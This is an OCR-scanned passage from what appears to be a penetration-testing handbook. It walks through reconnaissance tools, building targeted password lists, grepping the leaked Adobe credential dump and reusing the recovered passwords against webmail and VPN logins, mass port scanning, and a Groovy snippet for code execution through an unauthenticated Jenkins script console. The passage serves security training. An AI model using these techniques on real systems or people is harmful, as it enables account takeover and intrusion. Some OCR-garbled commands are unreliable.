12. Parse XML 

13. Start a Metasploit listener 
14. Update 

15. Exit 


Choice: 





Discover Script 


e cd /opt/discover 
e /discover.sh 
o ]. Domain 
o ]. Passive 
o [Company Name] 
o [Domain Name] 
o firefox /root/data/[Domain]/index.htm 


The results include information about email addresses, names of employees, and hosts. 


om/pages/passive-recon.htm 
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Home Contacts DNS 


Reports: Passive Recon 


Summar y 

Emails 18 
Names 87 
Hosts 9 

Squatting 48 
Subdomains 32 
Text 1 

Emails (18) 


@suck . testlab 
eli@suck.testlab 
feedback@suck.testlab 
jay@suck.testlab 
jgallegosQsuck.testlab 
jgrosser@suck.testlab 
joe@suck.testlab 
justthetip@suck.testlab 
mark@suck.testlab 
mike@suck.testlab 
opensource@suck.testlab 
plathrop@suck.testlab 
ron(suck.testlab 
sammy@suck . testlab 
sbaker@suck .testlab 
sfrench@suck .testlab 
support(suck.testlab 
synack@suck . testlab 


Names (87) 


Ackerson, Matt 
Adelson, Jay 
Ahuja, Nancy 


s/passive-recon.htm 


Discover Report 


Some of the more interesting findings are those such as squatting and bitflipping. Discover shows us 
which squatting domains have been purchased and which are currently free. In an engagement, a 
doppelganger domain could prove extremely valuable for phishing, trust, or compromising victims. 
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Iroot/data/diqq.com/pages/passive-recon.htm 
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Home Contacts DNS Domain 
Reports: Passive Re: 
Squatting (48) 
Character Omission suc. testlab 199.181.132.250 United States 
Character Repeat suckk, testlab 103.232.215.143 
Character Swap Suck. testlab 209.61.212.154 United States 
Double Character Replacement ѕиссК. testlab 72.52.4.119 United States 
Missing Dot Suckcom.com 96.44.141.211 United States 
Missing Dot wwwsuck.testlab 54.72.9.51 United States 


Subdomains (32) 


about. suck. testlab 50.18.104. 27 
about. suck. testlab 50. 18.125.174 
about. suck. testlab 50. 18. 188.137 
apidoc.suck.testlab 50. 18. 169. 106 
blog.suck.testlab 66.6.42.22 
bloa.suck . test]ah 66.6.43.22 


Discover Domain Information 


Spiderfoot 
(http://www.spiderfoot.net/)(Kali Linux) 


One last tool I like to use for OSINT is SpiderFoot. SpiderFoot, written by Steve Micallef, is a quick 
little tool that performs a ton of different OSINT recon. Every tool queries the data slightly differently 
and presents it in different fashions. Thus, it helps to have multiple tools to gather OSINT data to 
compile a good view of the victim company. 


Running SpiderFoot: 
ө cd /opt/spiderfoot/spiderfoot* 


e python /sf.py 
e open up a browser and go to http://127.0.0.1:5001/ 


SpiderFoot v2.3 - Iceweasel -|o 


[&] SpiderFoot v2.3 x d 
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New Scan 


Scan Name 


SUCK 


Seed Target 


By Required Data By Module 


Affiliate - IP Address Affiliate - IP Address - Subnet 





м мМ 
| Affiliate - Internet Name v Affiliate - Web Content 
gı BGP AS Membership gj BGP AS Ownership 
[7 BGP AS Peer Blacklisted Affiliate IP Address 
1 Blacklisted IP Address Blacklisted IP on Owned Netblock 
[7] Blacklisted IP on Same Subnet vı Co-Hosted Site 
yz, Cookies pj ONS TXT Record 
gı Defaced Л Defaced Affiliate 
yz, Defaced Affiliate IP Address gj Defaced Co-Hosted Site 
| A DefacedIP Address fA Device Type iw 
SpiderFoot 


What type of information is collected? Everything from blacklists to IPv6 addresses to Co-Hosted 
Sites to E-mail addresses. As you know, every tool is maintained differently and there are many times 
where one tool will find different information compared to another tool. What is good about 
SpiderFoot is that it is quick, very easy, and comes back with a ton (I mean a ton) of great OSINT 
information. I ran a quick scan for a site and within seconds, I found loads of information on a domain 
or IP. 
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SpiderFoot Report 


With these three sources, we should have a good idea of our victim's open source intelligence. This 
data will become very valuable later, so make sure you review all the data thoroughly. 


Creating Password Lists: 


From the OSINT searches, we have learned a great deal about SUCK and their organization. The next 
step is to find more targeted information about the company, the people, the location, and their 
customers by developing more customized password lists. We have all used large password lists in 
the past and specifically in THP1, but we are looking to crack that 70%+ rate. To achieve this, we 
need to create custom and smart word lists based on our victim companies and related industries. 


In the last book, we used the crackstation list, which we will definitely use again, but after having a 
great password base, you need to also build a list of custom passwords. 


Wordhound 
(https://bitbucket.org/mattinfosec/wordhound.git) (Kali Linux) 


Wordhound is a tool that creates word lists and dictionaries based on Twitter searches, PDF 
documents, and even Reddit sub-reddits. So to target our victim company, we can grab all the results 
from their tweets and even words that might be associated with the company. {1} 


Wordhound didn't run right off the bat in Kali Linux at the time of writing this book, so I had to do a 
few modifications: 

e git clone https://bitbucket.org/mattinfosec/wordhound.git /opt/wordhound/ 

e apt-get install python-setuptools 

e cd /opt/wordhound && python setup.py install && ./setup.sh 


I had some issues with tweepy, so 1 had to manually git clone it and re-download it: 
e manually install tweepy 
o pip install -U pip 
o git clone https://github.com/tweepy/tweepy.git /opt/tweepy/ 
o cd /opt/tweepy 
o python ./setup.py install 
o /usr/local/bin/pip install requests[security]| 
© service ntp restart 


Once you get everything working, we need to edit the configuration file: 
e cd /opt/wordhound && gedit wordhound.conf.dist 
e Input the relevant information such as your twitter API key if you want to use twitter. 
If you don't currently have a Twitter API key, you can get one from here: 
https://apps.twitter.com/app/new. Once you get your key, write down your: 
o Consumer Key (API Key) 
o Consumer Secret (API Secret) 
о Access Token 
о Access Token Secret 
e cp wordhound.conf.dist wordhound.conf 


After adding these to your wordhound.conf.dist file, save or move that copy to wordhound.conf. That 
is really the only initial configuration you will need to get this all working. For our first run, we are 
going to first generate a dictionary from a website. This will scrape the webpage and make a unique 
list of words to use for our password list. 


To start Wordhound: 
e cd /opt/wordhound 
e python Main.py 
e ]. Generate Dictionary 
e 3. Create new industry 
o Enter industry: SUCK 
e ]. Generate Dictionary 
e 1. SUCK 
e ]. Create new client 
o SUCK 
e 1. Generate Dictionary from website. 
o http://www.securepla.net 
e How many levels: 3 
e gedit "data/industries/Hacker Playbook/Hacker Playbook/WebsiteDictionary.txt" 


bypassuac 
pentestgeek 
hacker 
mimikatz trunk 


vulnerabilities 


crackstation 

hackers 

titrtiiwygi 

"data/industries/Hacker Playbook/Hacker Playbook/WebsiteDictionary.txt" 
Wordhound - Web Results 


Now, with a good list from websites, we need other sources of data to append to that list. One great 
source of valuable data is Twitter. Twitter usually includes very relevant data based on specific 
searching. We can use Wordhound to go through Twitter on a specific word or words and grab all the 
unique words from it. Let's run this by choosing: 


e 4. Generate Dictionary from twitter search term. 

o Search Term: hacking 
ө gedit data/industries/Hacker\ Playbook/Hacker\ 
Playbook/TwitterSearchTermDictionary.txt 
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root@kali: /opt/wordhound 


File Edit View Search Terminal Tabs Help 


ot@kali: /opt/wordhound root@kali: /opt/wordhound WebsiteDictionar 


OPTIONS === 


er search term. 


e?:(Default = 700) (Ma 





Wordhound — Twitter 
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root@kali: /opt/wordhound | TwitterSearchTermDictionary.t 


playbook 

hacker 
penetrationtesting 
suspenseful 

tweet 

immature 

crayola 

bestfriend 

mpyz 

suhh 

lrmtpflyql 
tutorials 
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infosec 





Wordhound - Twitter Results 


Another favorite source of data is from Reddit. This is where you get creative. You need to find the 
right sub-reddits that represent your company or industry. You can try a multitude of different sub- 
reddits to find out which best suit your engagement. 


Since our target in this case is a security company, we can parse one of my favorite sub-reddits: 
/r/netsec. Let’s see what types of unique words we can identify: 


e 5. Generate Dictionary from Reddit 
О netsec 


root@kali: /opt/wordhound Reddit Dictionary. txt 


meterpreter 
inmemory 
annonymous 
mandem 

damn 
writeable 
adddress 
opsec 

block cipher 
blockcipher 
dont know 
dontknow 
memory dump 
memorydump 
north korea 
northkorea 





Wordhound - Reddit 


We can see from /r/netsec, that we have a lot of new words to add to our potential password list that 
we might not have caught with the other lists. Target industries from different subreddits—maybe the 
city they belong to, the company, the industry, etc. 


Brutescrape 
( ) (Kali Linux) 


I had problems getting Wordhound to parse webpages properly, so until it is fixed, I created a quick 
python script to scrape pages and provide unique results. BruteScrape 15 a tool that reads the source 
of any webpage, parses out all the HTML tags, cleans up the results, and uniques them. This is a great 
quick tool to build password lists froma bulk import of websites. 


e cd /opt/brutescrape/ 
ө gedit sites.scrape and put in the websites you want to scrape 
e results are stored to passwordList.txt 





BruteScrape 


The customized passwords gained from BruteScrape and Wordhound, combined with the large 
common password lists, give us a great start to crack and brute-force accounts. 


Using Compromised Lists To Find Email Addresses And 
Credentials 


The great thing about being a penetration tester is that you have to get creative and use all sorts of 
resources, just as if someone was malicious. One tactic that I have found to be very fruitful in the past 
is using known credential dumps for password reuse. Let me explain a little more in detail. 


There was a large breach of Adobe's systems. The compromised information consisted of email 
addresses, encrypted passwords, and their password hints. {2} The large dump, which was almost 10 
Gigabytes, was released privately in small circles and is now publicly available (try searching for 
Adobe and users.tar.gz). From an attacker's perspective this is a gold mine of information. What I 
generally do is parse through this file and identify the domains against which I am doing a test. 


Of course, it is important to see if this type of testing is in the scope of your engagement and that you 
aren't breaking any laws by obtaining a copy of any password/compromised lists. If it is a full black 
box test, this should definitely be a part of your attacking approach. 


For example, in the image below, I will search (using the Linux grep command: grep "@yahoo.com" 
cred > hashlist.txt) through the Adobe password list for a sample domain of yahoo.com and write that 


to a file named hashlist.txt (remember you should search for the domain for which you are testing). 
We can see that there are many users (which I redacted) with an email address containing yahoo that 
have an encrypted password and password hint. 


root@kali:/mnt/hgfs/users# grep "yahoo.com" cred 


H8705- | -- | -Byahoo. com- | BB4e6Xtb2xLioxG6CatHBwem- |-boyfriend|-- 
38709 | | G8yahoo.com | kxiVia47bSlfIES5Ulu/AzAe- | newest | 
38713-|--|-üyahoo.com- | mvOh9x97N02evKXqSn90tiqes- | mobile] 
H8714-|--|-8yahoo. com- | -vOIOzz9qtSI]K53VtQ56Pw—- |-itim b|— 
387410-|--|-8yahoo.com- | -JEaIahiucóéo--|-torutoru|-- 
gB8742-|--|-8yahaoo.caom-|-SBCt-JYfYODqvJr91/X593---|-Wtf am i?2|-- 
BB8743-|-—|-8yahoo.com.ar-| -AHbJt-bxAI] R5EKSgskb6IRg-—-|-|-- 
38747- | == | -Hyahoo. com- | -qvEchüzMctbxHUX3hoobqQ--- | -birthday|-- 
J8754-|--|-dyahoo.com.mx- | -a6/bE-250FOUhoAs8VQBwrEA--- | -tito|-- 
38777- | -- | -Byahoo. com- | -9RdxzBwDTIzBDJXnKHBbVA--- |-karibu|-- 
H8784- [== | -Byahoo. com- | -JbGTpK8*360—- | -aai£u1303|-- 
38786-|--|-8yahao.com- | -bCaqh9EOHxz-- | = | == 
B8B787-|--|-8yahoo.com-|-6zygjkWHd3XioxGC6CatHBwss-|-my friend|-- 
H8785-|--|-8yahoo.com-|-AJ3ahuFmDyEUSIQsp4TdDov—-|-Judy and my Favorite Number|-- 
38735-|--|-üvahoo.com-|-IgKV6kegyzpbioxGG6CatHBw---|-TANGA!Paggword mo un za fe and cr|-- 
SA 796-|--|-G@yahoo. com—|-PwtJ2e0edIM=- | -baby|-- 
H8801-|--|-8yahoo.com- | -EcAXR7xCEE71oxCG6CatHBv—- | -catz2|-- 
38803-|--|-üyahoo.com.br-|-yp2RLbBiQXz--|-|-- 
8808-|--|-Gyahoo.com-|-S8BYOAGpn7mQz-|-klaus one|-- 
88812- | -- | -Byahao. com- | -DGMZ2c /HbXTIDDM5y62s6/10--- |-same | -- 
H881B8-|--|-üyahoo.com- | -HERAXM/bvHHioxG6CatHBw--- | -toah| == 
18822- | -- | -üyahoo. com. рт | -zkT3 Yi FvkFfox4TFawrZFAzz-|-Sacret|-- 
8823-|-- | -Byahna. cam- | -Tiavf AGASSI  axC5Ca E HRye- | -hi ghscheal | -- 


List of Accounts/Passwords from Adobe Breach 2013 


Based on the hints, you could do some research and find out who a specific user's boyfriend is or the 
name of their cat, but I usually go for the quick and dirty attempt. I was able to find two groups of 
researchers who, based on patterns and hints, were able to reverse some of the encrypted passwords. 
Remember that from the Adobe list, since the passwords aren't hashes but encrypted passwords, 
trying to reverse the passwords is much more difficult without the key. The two reversed lists I was 
able to identify are: 

e http://stricture-group.conyfiles/adobe-top100.txt 

e http://web.mit.edu/zyan/Public/adobe sanitized passwords with bad hints.txt (no 

longer available) 


I combined both these lists, cleaned them, and hosted them on my Github: 
e https://github.com/cheetz/adobe password checker/blob/master/foundpw.csv 


Taking this list, I put together a short python script that parses through a list of email/encrypted 
passwords and compares that against the foundpw.csv file. Let’s pull this code onto your Kali Linux 
host: 

ө git clone https://github.com/cheetz/adobe_password_checker 

/opt/adobe_password_checker 

e cd /opt/adobe_password_checker/ 


The password check.py python script will find any password matches between the hashlist.txt file 
you created and the foundpw.csv file, which contains known passwords. When a match is found, the 
script will return a list of email addresses and the reversed passwords. Of course, the two research 
groups do not have a large number of the passwords reversed, but it should contain the low-hanging 
fruit. Let's see this in action: 

e Make sure to copy your hashlist.txt file to /opt/adobe_password_checker/ 

e python password check.py 


./opt/adobe password checker# python password check .py 
atches[+]: t@yahoo.com : GozhWzLDSAChcdBSCgl/UQ==,if your a hacker my password is january: 
latches +]: @yahoo.com : BoZhwWzlbSALecdBHSCqu/UU-2,1T your à hacker my password 15 january4 
atches[4]: plüya ‚ BozhWzLbSACOC L/UQ==,1f your a hacker my password is january 


latches!«] : Qy com : ҮТ LOSACH Q==,17 your à hacker my password 15 january4 
atches[4] : wi hoo.com : Gozhwz dBScgt/Ugs= pif your a hacker my password is jan 
latches|*] : Së com : BoZhWzlb: eek Lf your а hacker my password 15 january 
atches[+]: 150@уаһоо „сов : BoZh vi snis EdBSCqu/UQes, if your a hacker my password is janua! 


i= Common password 15 the Key its right in front oi 
Custom mm Script to Look for Email/Passwords 





I will usually take the results from this output and try the usernames/passwords against the company's 
Outlook Web Access (OWA) logins or against VPN logins. You may need to play around with some 
of the variables on the passwords (i.e. if they have 2012, you might want to try 2015) and also make 
sure you don't lock out accounts. 


I then take the email addresses gathered from these findings and use them in spear phishing 
campaigns. Remember, if they are on the Adobe list, there is a good chance that these users are in the 
IT group. Owning one of these accounts could be extremely beneficial. 


This is why penetration testing is so much fun. You really can't just run tools—you have to use your 
own creativity to give your customer the best and most real-world types of attacks they might receive. 
Don't forget to keep checking Pastebin type sites, password dump sites, and Bittorrent files for 
password leaks. 


Gitrob - Github Analysis 
(https://github.com/michenriksen/gitrob) (Kali Linux) 


In today’s world, the “information gathering game” is changing ever so rapidly. If your client is a 
large client, chances are many of the developers are also on Github. This is where Gitrob comes into 
play. Michael Henriksen developed a tool to search through Github for a customer and any potentially 
sensitive files. These files can include secret HTTP endpoints, session IDs, user information, 
passwords and API keys. 

In terms of OSINT, these sources are great for gathering emails, learning about what the potential 
company might be developing, default passwords, possible API keys, and more. 


Configuring Gitrob: 
e cd /opt/gitrob/bin 


e /gitrob --configure 

e user: gitrob 

e password: from what you configured during the installation 

e To access Github via this API, we need to first get an Access Token: 
o Create/Login to Github Account 
o Go to Settings -> Applications 
o Generate Token 

e Enter the Token into Gitrob 


ub. Inc. [US]. https://github.com 
С) Explore Gist Blog Help га + OO F 


Applications 





Gitrob search 


To start a Gitrob search: 
e gitrob -o <orgname> 


In our example below, we will test this against the org name of reddit. 


:/opt/gitrob/bin# gitrob -o reddit 


| 
| 
| 
Ву @michenriksen 


Starting Gitrob version 0.0.3 at 2015-01-15 04:09 EST 
Loading configuration... done 

Preparing SQL database... done 

Loading file patterns... done 

Collecting organization repositories... done 
Collecting organization members... done 
Collecting member repositories... 

Collected 6 repositories from atiaxi 
Collected 14 repositories from ajacksified 
Collected 5 repositories from alienth 
Collected 3 repositories from bsimpson63 
Collected 16 repositories from btholt 
Collected 5 repositories from Deimos 
Collected 9 repositories from JordanMilne 
Collected 7 repositories from mtitolo 
Collected 1 repository from rram 

Collected 15 repositories from spladug 
Collected 6 repositories from umbrae 
Collected 27 repositories from xiongchiamiov 
Collected 6 repositories from zeantsoi 


Processing repositories... 
sed 75 files from reddit/reddit-il8n with no findings 
128 files from reddit/iReddit with no findings 
28 files from reddit/snudown with no findings 
19 files from reddit/monitors with no findings 
20 files from reddit/error-pages with no findings 
20 files from reddit/push with no findings 


Gitrob - Running 








Once the scan is complete, open a browser and go to http://127.0.0.1:9393/. You will see three tabs. 
The first tab is the findings. These might contain information such as references to secret HTTP 
endpoints, session IDs, user information, passwords and API keys. 


+ 1 
мой Visited v PHOftensive Security Эка! Linux N Kali Docs.  #хдол-ОВ Aircrack-ng 





Gitrob - Findings 


The second tab shows all the users it was able to grab, along with associated repositories. 


Organizations ) reddit 





Gitrob - Users 


OSINT Data Collection 


Collecting and studying a company passively is one of the most important factors in a successful 
penetration test. This allows us to gain a wealth of data without ever triggering a single IDS alert. 


We should now have enough information about the company, the industry, and possible user 
passwords. The best part is that we found all this data passively. Let’s move on to scanning and 
active discovery. 


External/Internal Active Discovery 


Active discovery is the process of trying to identify systems, services, and potential vulnerabilities. 
We are going to target the network ranges specified in scope and scan them. Whether you are scanning 
from the internal or the external segments of the network, it is important to have the right tools to 
perform active discovery. 


I want to emphasize that this book is not going to discuss in detail how to run a scanner, as you should 
already be familiar with that. If you aren’t, then I recommend that you download the community 
edition of Nexpose or get a trial version of Nessus. Try running them in a home network or even in a 
lab network to get an idea of the types of findings, how to use authenticated scans, and the type of 
traffic generated on a network. These scanners will trigger IDS/IPS alerts on a network very 
frequently as they are extremely loud. Now that we are ready, let's get into some of the finer details 
here. 


In this section, I describe the process that I like to use when scanning a network. I will use multiple 
tools, processes, and techniques to try and provide efficient and effective scanning. My scanning 
processes will look something like this: 


e Scanning with Masscan 


e Scanning with Sparta 

e Scanning with HTTP Screenshot 

e Scanning with Eyewitness/ WMAP 

e Scanning using Nexpose/Nessus/OpenVAS 
e Scanning with Burp Proxy Pro 

e Scanning with ZAP Proxy 

e Parsing Output 


Masscan 
(https://github.com/robertdavidgraham/masscan) (Kali Linux) 


Once you start active scanning, there are many tools to use. Historically, we have all used nmap to 
map out IPs/Ports, but the game has been changing. Large ranges are a pain to scan, but this is where 
Masscan comes into play. Similar to nmap (it even has similar flags), Masscan uses its own custom 
TCP/IP stack for speed and efficiency. Let's see how we would kick off a Masscan scan. 
Running Masscan: 
e cd /opt/masscan/bin/ 
e ./masscan -p80,8000-8100 10.0.0.0/8 
e ./masscan -p0-65535 --rate 150000 -oL output.txt 
o -p defines the ports to be scanned 
o --rate defines packets-per-second 
m Be careful with this setting. Make sure your VPS the 
servers or that the system/network from which you run 
Masscan can support the amount of traffic 
o -oL defines the list output to write to 


For example, I ran some test scans from a VPS server: 


hp2:/opt/masscan/bin$ ./masscan -p0-65535 23.239.151.0/24 --rate 150000 -oL 

output.txt 

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-02-02 05:46:10 GMT 

-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth 

Initiating SYN Stealth Scan 

Scanning 256 hosts [65536 ports/host] 

hp2:/opt/masscan/bin$ date 

Mon Feb 2 05:48:23 UTC 2015 
From the test scan above, we are looking at taking about two minutes for the configuration and system 
on which we are testing. Luckily my VPS has very large networks and can support a high rate of 
packets per second. 


Running nmap with similar settings: 
hp2:/opt/masscan/bin$ nmap -v -PN -n -sT -T5 23.239.151.0/24 -p0-65535 -oN 


output_nmap.txt 

Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-02-02 05:53 UTC 
Initiating Connect Scan at 05:53 

Scanning 64 hosts [65536 ports/host] 

Discovered open port 80/tcp on 23.239.151.23 

Stats: 0:00:22 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan 
Connect Scan Timing: About 1.18% done; ETC: 06:26 (0:32:11 remaining) 


From the in progress results above, we can see the scan will take well over 30 minutes (as it is 
scanning 64 hosts at a time). 


Masscan improves scanning significantly and allows a tester to scan and have results in minimal time. 
One feature that really helps you configure your Masscan scans is the use of the --echo switch. The 
example below writes a sample scan to a file. Reading that file configures all the different settings 
that the scan will use. Once all the settings are correct, a scan can be kicked off with a “-c” flag. 


ө hp2:/opt/masscan/bin# ./masscan -p0-65535 23.239.151.0/24 --rate 150000 -oL 
output.txt --echo > scan.conf 
e hp2:/opt/masscan/bin# cat scan.conf 
rate = 150000.00 
randomize-hosts — true 
seed = 14393045175689752532 
shard = 1/1 
# ADAPTER SETTINGS 
adapter-ip = 0.0.0.0 
# OUTPUT/REPORTING SETTINGS 
output-format = list 
show = open,, 
output-filename = output.txt 
rotate = 0 
# TARGET SELECTION (IP, PORTS, EXCLUDES) 
ports = 0-65535 


range = 23.239.151.0/24 


e hp2:/opt/masscan/bin#./masscan -c scan.conf 


We can save this template and use it for all future scans or have a list of templates for specific types 
of scans. 


Sparta 
(http://sparta.secforce.com/)(Kali Linux) 


Throughout this book, I really try to push the ideas of efficiency and effectiveness. Scanning really 
large networks works great with Masscan, but for smaller or internal networks, we can use a tool like 
SPARTA. 


"SPARTA is a python GUI application which simplifies network infrastructure penetration testing by 
aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by 
having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If 
little time is spent setting up commands and tools, more time can be spent focusing on analysing 
results.” {3} 


The reason I have found SPARTA to be valuable as part of my toolkit is that it runs NMAP in a 
staged process. SPARTA will start an initial scan of limited ports, start Nikto for any web ports, and 
performs screen capture. After the stage 1 scan finishes, it will start a much deeper stage 2 and stage 
3 scan of Nmap. 


Once services are identified, you can easily manually check Nikto, MySQL default credentials, and 
plug directly into the Hydra password brute-force tool all via the GUI interface. 


To start up SPARTA: 
e cd /opt/sparta/ 


e /sparta.py 


SPARTA is really simple and straightforward to use. Once you load up the GUI console, click to add 
hosts and start scanning. SPARTA takes advantage of the nmap detection to start using its auxiliary 
modules. 
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SPARTA - Nikto Scan 


In the Nikto tab, we can see the results from the Nikto scan. 


po, 
Services Scripts | Information Notes | nikto (80/tcp) & | screenshot (80/tcp) & 


- Nikto v2.1.6 
I + Target IP 10.239.151.23 
+ Target Hostname: 10.239.151.23 
* Target Port 80 
* Start Time 2015-02-16 15:49:07 (GMT-5) 


* Server: Apache/2.4.7 (Ubuntu) 

* Cookie PHPSESSID created without the httponly flag 

+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5 

* The anti-clickjacking X-Frame-Options header is not present 

* Root page / redirects to: dashboard/ 

+ No CGI Directories found (use '- C all’ to force check all possible dirs) 


SPARTA - Nikto Results 


SPARTA will also use cutycapt to take screenshots of the web pages. 


=== 
Services Scripts Information Notes nikto (8O0/tcp) [€ | screenshot (80/tcp) & 





SPARTA - Screenshot 


What makes SPARTA so quick is that you can right-click on any host and send it to Hydra. In this 
case, we identify a host with SSH running on HTTPS (443). We can right-click on that host and “Send 
to Brute". 


—— 


5сап Вгше 
ga en 
Hosts | Services Tools Services 
Name Host Port Protocol State Version 
http ө 10239151219 443 tcp open OpenSSH 6.0p1 Debian 4* deb 
http-proxy Open with netcat 
https Open with ssh client (as root) 
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Run nmap (scripts) on port 


SPARTA - Brute-force 


Clicking on the Brute tab, you can supply either a single username/password combo or form 
password lists. 


SPARTA 1.0.1 (BETA) - untitled - // 
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SPARTA - Brute 


It also has additional functionality for MySQL to check default credentials. 


Services Scripts Information Notes | nikto (Bü/tcp) © | nikto (443/tcp) = screenshot (Bü/tcp) = зс 


Port Protocol State Name Version 


80 tep open http Apache httpd 2.2. 29 ([Unix) modassl/2.2.29 Ope... 


tcp open http Apache httpd 2.2.29 ([Unix) mod. ssl/2 2.29 Ope... 


MySQL (unauthorized) 
Open with mysql client (as root) 


Open with netcat 
Open with telnet 
Send to Brute 


Check for default mysql credential RU 


Grab banner 





Run птар [seripts) an pert 
SPARTA - MySQL Check 


While you might use Masscan on large external ranges to do initial discovery, SPARTA is a valuable 
tool to increase your scans. 


Http Screenshot 
(https://github.com/breenmachine/httpscreenshot)( Kali Linux) 


One of the most efficient and effective starting points on a penetration test is understanding what 
systems and services are available. Although there are plenty of network/service level exploits, I 
have found most initial entry points into an organization, especially from the outside, to be via web 


applications, because systems have default passwords, simple misconfigurations, or many known 
web application flaws. 


After the reconnaissance phase, you have identified that the Secure Universal Cyber Kittens company 
has a CIDR /20 range on their externally-facing environment. That comes out to 65536 different IPs 
that we need to scan and start analyzing. Sure, we kick off our vulnerability scanner in the 
background, but we need to start attacking, as time is limited. Since there is no way we could visit 
each and every one of those web pages, we need to automate this process and be able to utilize the 
resulting data in an efficient manner. 


This is where we combine both Masscan and HTTP Screenshot to scan the network and take 
screenshots of the webpages. This way, we can visually look at web pages instead of visiting them 
one by one. Before starting the scan, we need to configure a few settings: 
e cd /opt/httpscreenshot 
e edit masshttp.sh to make sure it points to the right masscan executable and make sure 
that httpscreenshot.py points to the correct location. 
o instead of /root/masscan/bin/masscan, it should be 
/opt/masscan/bin/masscan 
o instead of -/tools/httpscreenshotpy, it should Бе 
/opt/httpscreenshot/httpscreenshot.py 
ө change the port to be scanned from 80,443 to 
80,443,8000,8001,8080,8443,8008,9200,50070 [add your favorite web ports here] 
e create a file called networks.txt to put in the network cidr range you want to scan 
© gedit networks.txt 


Let's kick off a scan: 
e /masshttp.sh 
e firefox ./clusters.html 


With the speed of Masscan and the power of HTTP Screenshot, we have a list of websites with the 
host images. There are a lot of benefits of HTTP Screenshot such as resolving certificate hostnames 
for virtual/shared hosting and threading, but the biggest benefit is how it correlates similar web pages 
together. You might have a ton of http basic auth pages or printers and HTTP Screenshot will 
correlate them together. It makes it much easier for attacking and reporting. I will say that the output 
isn't the prettiest, but the functionality is what works. 


So what are we looking for in web application screenshots? The things that should pop out are: 


Content Management | VoIP Pages | Networking Printers 
Pages (WordPress, Devices 
Joomla) 


Tomcat Beta/Dev Indexed Pages | Test sites 
Sites 





Why? Because we want shells! A great place to walk through to get a better understanding of 
vulnerable web applications is to review the exploits themselves. Let’s stop and take a quick look at: 
http://www.exploit-db.com/webapps/. 


From our scan of SUCK, we see normal services like printers (which we will get into a little later), 
but one thing I now often see on pentests is a couple of Jenkins hosts. This quickly stands out to me 
and, as stated before, one of the benefits of HTTP Screenshot is that it puts all the Jenkins’ servers 
together. Jenkins is a web application that provides continuous integration services for software 
development. Regardless of what it really does, it has some features that can give us our first point 
into our network. 
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HTTP Screenshot 


Unauthenticated Jenkins servers are known to have a flaw that allows remote code execution using 
Groovy Script. Pentestgeek.com did a great article on how to take advantage of this vulnerability, by 
visiting the Jenkins’ box over port 8080 and traversing to /script/script: 

e http://[IP]:8080/script/script 


Here, we are presented with a script console, where we can execute arbitrary Groovy Script 
code (4) : 

e def sout — new StringBuffer(), serr — new StringBuffer() 

e def proc = '[Code to Execute Here '.execute() 

e proc.consumeProcessOutput(sout, serr) 


e proc.waitForOrKill(1000) 

e println "out> $sout err> $serr" 
This works on both Windows and *nix systems, so just make sure you first find out what system you 
are attacking. In the example below, we will run a quick “cat /etc/passwd" to make sure that we have 
code execution. 


< 192.168.123.123 м 
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Script Console 








Виа Executor Status = 


Result 





x:1:1:dae 
:2:bin: /bin: /bin/st 


Jenkins Vulnerable Server | 


As you can see in the results, we were able to execute and read our payloads. We won't dive much 
more in this section, but this provides a good example of how HTTP Screenshots can be beneficial. 


One additional thing I want to point out when doing web screenshots is that you will sometimes run 
into issues where one of the tools does not work or run into certain scenarios where you need more 
information. I always tell my readers to never focus on one tool, and in this case there are two other 
tools to look at: 


Eyewitness - https://www.christophertruncer.com/eyewitness-triage-tool/ ended up really replacing 
Peepingtom, which was talked about in the first book. Eyewitness works great, but I have had 


problems on large scans. These might be fixed by now, but this was just one of the many issues I kept 
running into. 


One other tool that I would look into is an interesting project called WMAP Network Scanning. The 
gap they are trying to solve is that these web scrapers don't generally handle or render Flash or Java. 
On those special pentests where you have a ton of these types of sites, you could look into this 


Chrome Extension: 
e http://thehackerblog.com/wmap-a-chrome-extension-for-taking-screenshots-of-web- 
services/ 


e https://chrome. google.com/webstore/detail/wmap/pflahkdjlekaeehbenhpkpipgkbbdbl 


How WMAP works is that it uses Chrome to open a new tab with the IP and takes a picture of the 
page. It takes advantage of the fact that the browser will do all the rendering. 


Configuring WMAP is extremely simple after the installation of the Chrome plugin. 
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WAMP Results 


I do have some problems with this tool, mainly with speed and how it opens a tab for each site, but it 


does render things that Peepingtom and Eyewitness cannot since it uses the browser. 


Vulnerability Scanning: 


After performing initial scans and mapping out the network, I usually like to kick off a couple of 
vulnerability scans in the background. I will go over a few tools to help you with vulnerability 
scanning. 


Rapid7 Nexpose/Tenable Nessus 
(Kali/Windows/OS X): 


Two of the most common vulnerability-scanning tools I see are Rapid7 Nexpose and Tenable Nessus. 
Like I said in the last book, there is always a huge war about which one of the scanners is better, and 
again I offer this caveat: I have used most of the commercial scanners and have never found one to be 
perfect or the right solution. When comparing these tools, I have seen that there are always some 
findings that are discovered and missed by certain tools. The best idea would be to run multiple tools, 
but this isn't always the most financially acceptable solution. My quick two cents is that if you are 
going to purchase a single license, I would recommend getting Tenable's Nessus Vulnerability 
Scanner. For the number of IPs you can scan and the cost ($1,500), it is the most reasonable. I have 
found that a single consultant license of NeXpose is double the price and limited on the number of IPs 
you can scan, but I ask that you verify, as you never know when prices might change. In terms of 
performance and ease of use, for large complex networks, I prefer the management interface on 
NeXpose. In terms of finding odd vulnerabilities, Nessus takes the cake on this one. They definitely 
do a lot of research on embedded devices and SCADA (and the like), where I don't see those types of 
findings on my Rapid7 reports. 


The best option here is to give both of thema trial: 
e Rapid7 NeXpose: 
http://www.rapid7.com/products/nexpose/compare-downloads.jsp 


e Tenable Nessus: 
www .tenable.com/products/nessus/evaluate 


Openvas 
(http://www.openvas.org/)(Kal1) 


Since I do discuss a lot about commercial tools, as I mentioned in previous chapters, I want to be 
able to complement them with Open Source tools. There is a decent open source vulnerability tool 
that you can also use in your arsenal. Open Vulnerability Assessment System (OpenVAS) is a great 
tool for learning and testing vulnerabilities. Compared to the commercial tools, from my experience, 
OpenVas does pick up a lot of the similar findings, but I have noticed on engagements that it misses 
potentially high findings. I have also noticed that with OpenVAS, I had a lot of trouble when things 


break. When it breaks, it breaks hard and a lot of manual work is needed to get it back up and running. 


The positive side of OpenVAS is that it does do all the things required by a scanner. It can run 
